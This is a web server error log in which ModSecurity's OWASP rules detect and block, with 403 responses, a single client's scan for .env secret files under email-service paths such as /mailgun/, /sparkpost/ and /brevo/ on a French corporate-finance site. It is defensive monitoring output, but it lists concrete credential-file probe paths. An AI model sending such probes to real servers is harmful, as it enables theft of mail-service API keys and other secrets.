[Mon May 11 16:26:59.935173 2026] [security2:error] [pid 1411055:tid 1411078] [client 18.180.54.2:54072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/postmark/.env"] [unique_id "agHnM0WKUxpmnkK7zHx8WAAAARU"]
[Mon May 11 16:27:00.538704 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:54086] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sparkpost/.env"] [unique_id "agHnNFV4kyjgo4bQBUhU2QAAAM8"]
[Mon May 11 16:27:00.538933 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:54086] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sparkpost/.env"] [unique_id "agHnNFV4kyjgo4bQBUhU2QAAAM8"]
[Mon May 11 16:27:00.539431 2026] [core:error] [pid 1416109:tid 1416145] [client 18.180.54.2:54086] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:00.539595 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:54086] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sparkpost/.env"] [unique_id "agHnNFV4kyjgo4bQBUhU2QAAAM8"]
[Mon May 11 16:27:00.655974 2026] [security2:error] [pid 1411055:tid 1411080] [client 18.180.54.2:54090] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mailgun/.env"] [unique_id "agHnNEWKUxpmnkK7zHx8WQAAARc"]
[Mon May 11 16:27:00.656214 2026] [security2:error] [pid 1411055:tid 1411080] [client 18.180.54.2:54090] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mailgun/.env"] [unique_id "agHnNEWKUxpmnkK7zHx8WQAAARc"]
[Mon May 11 16:27:00.656686 2026] [core:error] [pid 1411055:tid 1411080] [client 18.180.54.2:54090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:00.656855 2026] [security2:error] [pid 1411055:tid 1411080] [client 18.180.54.2:54090] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mailgun/.env"] [unique_id "agHnNEWKUxpmnkK7zHx8WQAAARc"]
[Mon May 11 16:27:01.220737 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:54092] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/postmark/.env"] [unique_id "agHnNfy_GXSWIKeli0vypQAAAIQ"]
[Mon May 11 16:27:01.220962 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:54092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/postmark/.env"] [unique_id "agHnNfy_GXSWIKeli0vypQAAAIQ"]
[Mon May 11 16:27:01.221485 2026] [core:error] [pid 1411201:tid 1411250] [client 18.180.54.2:54092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:01.221647 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:54092] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/postmark/.env"] [unique_id "agHnNfy_GXSWIKeli0vypQAAAIQ"]
[Mon May 11 16:27:01.405101 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:54096] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mandrill/.env"] [unique_id "agHnNTJnyuKVXoStDha1UAAAAE4"]
[Mon May 11 16:27:01.405382 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:54096] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mandrill/.env"] [unique_id "agHnNTJnyuKVXoStDha1UAAAAE4"]
[Mon May 11 16:27:01.405929 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:54096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:01.406103 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:54096] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mandrill/.env"] [unique_id "agHnNTJnyuKVXoStDha1UAAAAE4"]
[Mon May 11 16:27:01.960018 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:54110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailgun/.env"] [unique_id "agHnNVV4kyjgo4bQBUhU4QAAAMU"]
[Mon May 11 16:27:01.960287 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:54110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailgun/.env"] [unique_id "agHnNVV4kyjgo4bQBUhU4QAAAMU"]
[Mon May 11 16:27:01.960793 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:54110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:01.960949 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:54110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailgun/.env"] [unique_id "agHnNVV4kyjgo4bQBUhU4QAAAMU"]
[Mon May 11 16:27:02.134918 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:54122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mailjet/.env"] [unique_id "agHnNjJnyuKVXoStDha1UQAAAFE"]
[Mon May 11 16:27:02.135148 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:54122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mailjet/.env"] [unique_id "agHnNjJnyuKVXoStDha1UQAAAFE"]
[Mon May 11 16:27:02.135651 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:54122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:02.135825 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:54122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mailjet/.env"] [unique_id "agHnNjJnyuKVXoStDha1UQAAAFE"]
[Mon May 11 16:27:02.663909 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:54132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mandrill/.env"] [unique_id "agHnNvy_GXSWIKeli0vypwAAAIw"]
[Mon May 11 16:27:02.664123 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:54132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mandrill/.env"] [unique_id "agHnNvy_GXSWIKeli0vypwAAAIw"]
[Mon May 11 16:27:02.664619 2026] [core:error] [pid 1411201:tid 1411258] [client 18.180.54.2:54132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:02.664775 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:54132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mandrill/.env"] [unique_id "agHnNvy_GXSWIKeli0vypwAAAIw"]
[Mon May 11 16:27:02.866404 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:54144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/brevo/.env"] [unique_id "agHnNjJnyuKVXoStDha1UgAAAFM"]
[Mon May 11 16:27:02.866649 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:54144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/brevo/.env"] [unique_id "agHnNjJnyuKVXoStDha1UgAAAFM"]
[Mon May 11 16:27:02.867122 2026] [core:error] [pid 1412074:tid 1412095] [client 18.180.54.2:54144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:02.867297 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:54144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/brevo/.env"] [unique_id "agHnNjJnyuKVXoStDha1UgAAAFM"]
[Mon May 11 16:27:03.347010 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:54154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailjet/.env"] [unique_id "agHnN1V4kyjgo4bQBUhU6AAAANI"]
[Mon May 11 16:27:03.347263 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:54154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailjet/.env"] [unique_id "agHnN1V4kyjgo4bQBUhU6AAAANI"]
[Mon May 11 16:27:03.347741 2026] [core:error] [pid 1416109:tid 1416148] [client 18.180.54.2:54154] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:03.347897 2026] [security2:error] [pid 1416109:tid 1416148] [client 18.180.54.2:54154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailjet/.env"] [unique_id "agHnN1V4kyjgo4bQBUhU6AAAANI"]
[Mon May 11 16:27:03.590593 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:54168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/transactional/.env"] [unique_id "agHnN0WKUxpmnkK7zHx8XgAAAQE"]
[Mon May 11 16:27:03.590853 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:54168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/transactional/.env"] [unique_id "agHnN0WKUxpmnkK7zHx8XgAAAQE"]
[Mon May 11 16:27:03.591393 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:54168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:03.591553 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:54168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/transactional/.env"] [unique_id "agHnN0WKUxpmnkK7zHx8XgAAAQE"]
[Mon May 11 16:27:04.029280 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:54184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/brevo/.env"] [unique_id "agHnOFV4kyjgo4bQBUhU6wAAANQ"]
[Mon May 11 16:27:04.029511 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:54184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/brevo/.env"] [unique_id "agHnOFV4kyjgo4bQBUhU6wAAANQ"]
[Mon May 11 16:27:04.029984 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:54184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:04.030140 2026] [security2:error] [pid 1416109:tid 1416150] [client 18.180.54.2:54184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/brevo/.env"] [unique_id "agHnOFV4kyjgo4bQBUhU6wAAANQ"]
[Mon May 11 16:27:04.297255 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:54186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/bulk/.env"] [unique_id "agHnOEWKUxpmnkK7zHx8XwAAARY"]
